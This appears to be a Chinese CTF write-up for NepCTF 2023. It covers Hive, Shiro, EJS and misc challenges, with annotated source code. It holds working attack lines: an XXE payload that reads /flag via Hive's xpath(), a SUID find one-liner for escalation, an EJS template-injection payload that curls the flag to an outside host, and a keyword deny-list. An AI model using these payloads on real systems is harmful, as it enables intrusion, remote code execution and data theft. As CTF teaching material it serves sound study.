NepCTF 2023

后期复现

Web

Hive it

参考文档:https://cwiki.apache.org/confluence/display/Hive/LanguageManual

CVE-2018-1282: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1282

  • 访问页面,可知在拥有正确token的情况下可以执行任意hivesql语句
  • 审计源码,存在与token相关的路由
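/**
 * GET /s3cretToken: answers with the fixed string "token".
 * The route name is the only thing hiding this value; presumably it is the
 * token the /tokenCheck gate expects — confirm against the caller.
 *
 * @return the literal "token"
 */
@GetMapping({"/s3cretToken"})
    public String token() {
        final String tokenValue = "token";
        return tokenValue;
    }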

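    /**
     * POST /tokenCheck: runs the HiveQL statement carried in the request body
     * and returns the query result as a string.
     *
     * Changes from the decompiled original: the unused StringBuilder was dead
     * code and is gone; a missing driver no longer calls System.exit(1) from a
     * request thread; the JDBC connection is closed on every path
     * (try-with-resources) instead of leaking one connection per request.
     *
     * @param paramBean request body; {@code getName()} is the statement text
     *                  and {@code getSinkType()} is passed through unchanged
     * @return {@code String.valueOf} of whatever HiveUtils.query returns
     * @throws IllegalStateException if the Hive JDBC driver class cannot be loaded
     * @throws Exception             propagated from JDBC / HiveUtils.query
     */
    @PostMapping({"/tokenCheck"})
    @ResponseBody
    public String token(@RequestBody ParamBean paramBean) throws Exception {
        try {
            Class.forName(driverName);
        } catch (ClassNotFoundException e) {
            // Deployment problem, not a per-request one: fail this request,
            // do not take the whole JVM down.
            throw new IllegalStateException("Hive JDBC driver not found: " + driverName, e);
        }

        // The statement text is client-controlled and executed as-is; nothing
        // in this method constrains it, so the endpoint is only as safe as the
        // check that gates access to it.
        try (Connection con = DriverManager.getConnection("jdbc:hive2://127.0.0.1:10000/default")) {
            return String.valueOf(HiveUtils.query(con, paramBean.getName(), paramBean.getSinkType()));
        }
    }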
  • /s3cretToken
  • 依据提供的docker信息,已知2.3.3版本hive-jdbc存在sql注入
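/**
 * Deny-list check for client-supplied HiveQL.
 *
 * {@link #checkInput(String)} returns {@code true} when the input contains one
 * of the blocked keywords as a whole word, i.e. {@code true} means "reject".
 *
 * Changes from the original: the pattern is compiled once instead of per call,
 * and it is case-insensitive (the original only matched lower-case, so a
 * different-case spelling of a blocked keyword slipped through).
 *
 * Known limitation: {@code \b} treats {@code _} as a word character, so a
 * blocked word joined to another token by an underscore is not a whole-word
 * match. A deny-list only blocks what it enumerates; an allow-list of
 * permitted statements is the stronger control.
 */
public class CheckInputFilter {
    private static final String[] KEYWORDS = {"java", "method", "remote", "outline", "reflect", "reflect2", "real_token", "update", "alter", "create", "drop"};

    // Compiled once; Pattern is immutable and safe to share across threads.
    private static final Pattern BLOCKED = Pattern.compile(
            "\\b(" + String.join("|", KEYWORDS) + ")\\b", Pattern.CASE_INSENSITIVE);

    public CheckInputFilter() {
    }

    /**
     * @param input the statement text to inspect
     * @return {@code true} if any blocked keyword occurs as a whole word, in any case
     * @throws NullPointerException if {@code input} is null
     */
    public boolean checkInput(String input) {
        Matcher matcher = BLOCKED.matcher(input);
        return matcher.find();
    }
}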
-- Statement from the write-up, run through the xpath() UDF: the inline XML
-- declares an external entity pointing at file:///flag and references it in
-- the document, and '/root/text()' returns what the entity expanded to.
-- '%26' is the URL-encoded '&', so the reference reaches the server as '&f;'
-- when submitted through the HTTP layer.
-- Defender's note: the payload only works because the XML parser behind
-- xpath() resolves external entities; the control is to disable external
-- entity resolution / restrict the UDF, not to extend a keyword deny-list.
SELECT xpath('<?xml version = "1.0"?>
<!DOCTYPE ANY [
        <!ENTITY f SYSTEM "file:///flag">
]>
<root>%26f;</root>','/root/text()')
  • 本地搭建环境的时候需要使 docker-hive 和 docker-java 处于同一内网

ezjava_checkin

  • 从响应头Set-Cookie判断为Shiro
  • 工具梭哈
  • flag位于根目录,权限不够,通过suid提权
  • find 提权
# Works only because find carries the SUID bit on this image, so the -exec
# child inherits root's effective uid. Defender's note: find has no business
# being SUID; strip the bit and audit the rest of the SUID inventory.
touch test && find test -exec cat /flag \;

Post_card_for_you

  • 源代码
var path = require('path');
const fs = require('fs');
const crypto = require("crypto");

const express = require('express')
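const app = express();
const port = 3000;

// Directory that /create writes per-page EJS templates into and /page reads
// from. Declared explicitly: the original assigned it without `var`/`const`,
// creating an implicit global.
const templateDir = path.join(__dirname, 'template');
app.set('view engine', 'ejs');
// NOTE(review): 'template' is not a standard Express setting ('views' is);
// render() below passes absolute paths, so this may be a no-op — confirm.
app.set('template', templateDir);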

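/**
 * Blocks the current thread for roughly `milliSeconds` by busy-waiting.
 *
 * This spins the event loop: no other request, timer or I/O callback runs
 * until it returns. (Cleanup only: the original declared an unused `i` and
 * used `var`.)
 *
 * @param {number} milliSeconds - how long to spin, in milliseconds
 * @returns {void}
 */
function sleep(milliSeconds) {
    const deadline = Date.now() + milliSeconds;
    while (Date.now() < deadline) {
        // busy-wait on purpose
    }
}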

// Landing page: a static file served from the app's own directory.
app.get('/', (req, res) => res.sendFile('./index.html', { root: __dirname }));

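/**
 * GET /create?name=&address=&message=
 *
 * Writes a fresh postcard template for this request and redirects the client
 * to /page, forwarding the three text fields as query parameters. All three
 * must be non-empty, otherwise a 500 is returned.
 *
 * Fixes relative to the original:
 *  - the readFile callback never checked `err`, so a missing source file threw
 *    inside the callback, outside the try/catch, and crashed the process;
 *  - the redirect was sent before the template was written, so the first
 *    /page request could 404;
 *  - the redirect URL was built by string interpolation, so a value containing
 *    `&`, `#` or `%` corrupted the query string;
 *  - the source layout was picked with a random sort comparator, which is a
 *    biased shuffle; a direct random index does the same job.
 */
app.get('/create', async (req, res) => {
    // String() keeps the original's loose-equality semantics for array values
    // (`[]` counts as empty).
    const name = String(req.query.name ?? '');
    const address = String(req.query.address ?? '');
    const message = String(req.query.message ?? '');

    if (name === '' || address === '' || message === '') {
        res.status(500).send("Params `name` or `address` or `message` empty");
        return;
    }

    // Pick an id whose template file does not exist yet.
    let uuid;
    do {
        uuid = crypto.randomUUID();
    } while (fs.existsSync(`${templateDir}/${uuid}.ejs`));

    try {
        const sources = ['source', 'source1', 'source2', 'source3'];
        const source = sources[Math.floor(Math.random() * sources.length)];
        const pageContent = await fs.promises.readFile(`${source}.html`, 'utf8');
        fs.writeFileSync(
            `${templateDir}/${uuid}.ejs`,
            pageContent.replace(/--ID--/g, uuid.replace(/-/g, '')),
        );
        // Kept from the original: spins the event loop for 2s after every
        // write; presumably a throttle on page creation — TODO confirm.
        sleep(2000);
    } catch (err) {
        console.error('create: failed to write template', err);
        res.status(500).send("Failed to write file");
        return;
    }

    const params = new URLSearchParams({ pageid: uuid, name, address, message });
    return res.redirect(`/page?${params}`);
});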

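/**
 * GET /page?pageid=<uuid>&name=&address=&message=
 *
 * Renders the template created by /create. `pageid` must be a v4 UUID and
 * its template file must exist, otherwise 404. The regex check is what keeps
 * `id` out of path-traversal territory before it is joined into a path.
 *
 * Security fix: the original passed `req.query` straight to `res.render`, so
 * a client could supply EJS engine options (the
 * `settings[view options][outputFunctionName]` trick) and run code at render
 * time. Only the fields /create forwards are handed to the template now.
 */
app.get('/page', (req, res) => {
    const id = req.query.pageid;
    const isUuidV4 = /^[0-9A-F]{8}-[0-9A-F]{4}-[4][0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test(id);
    if (!isUuidV4 || !fs.existsSync(`${templateDir}/${id}.ejs`)) {
        res.status(404).send("Sorry, no such id");
        return;
    }

    // Allow-list the template data; render options must never come from the client.
    const data = {};
    for (const key of ['pageid', 'name', 'address', 'message']) {
        if (req.query[key] !== undefined) data[key] = String(req.query[key]);
    }
    res.render(`${templateDir}/${id}.ejs`, data);
});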

// Bind to the fixed port declared at module scope and log once it is up.
app.listen(port, () => console.log(`App listening on port ${port}`));
  • ejs rce
{"pageid": id,"settings[view options][outputFunctionName]":  "_tmp1;global.process.mainModule.require('child_process').exec('curl "+vps+"/`cat /flag|base64`');var __tmp2"}

Misc

陌生的志涛

  • 《小魔女学院》新月文字 古龙语言

小叮当弹钢琴

  • morse + hex
youshouldusethistoxorsomething
0x370a05303c290e045005031c2b1858473a5f052117032c39230f005d1e17
  • xor

codes

  • 爆破栈
#include <stdio.h>

/*
 * Snippet listed for the "codes" task ("爆破栈": brute-forcing stack slots).
 * "%53$s" tells printf to dereference its 53rd variadic argument as a C string
 * although none is passed — undefined behaviour that reads whatever happens to
 * sit in that slot. `buf` is unused; presumably kept to reproduce the
 * challenge's frame layout — confirm against the original binary.
 * Defender's note: this is the reason a format string must never be
 * attacker-controlled; print data with printf("%s", s).
 */
int main() {
    char buf[0x8];
    printf("%53$s");
}

与AI共舞的哈夫曼

  • 问 chatgpt

你也喜欢三月七吗

  • CBC
salt = NepCTF2023
key = dd8e671df3882c5be6423cd030bd7cb6

ciphertext = 6148523063484d364c793970625763784c6d6c745a3352774c6d4e76625338794d44497a4c7a41334c7a49304c336c5061316858553070554c6e42755a773d3d
  • 某种文字
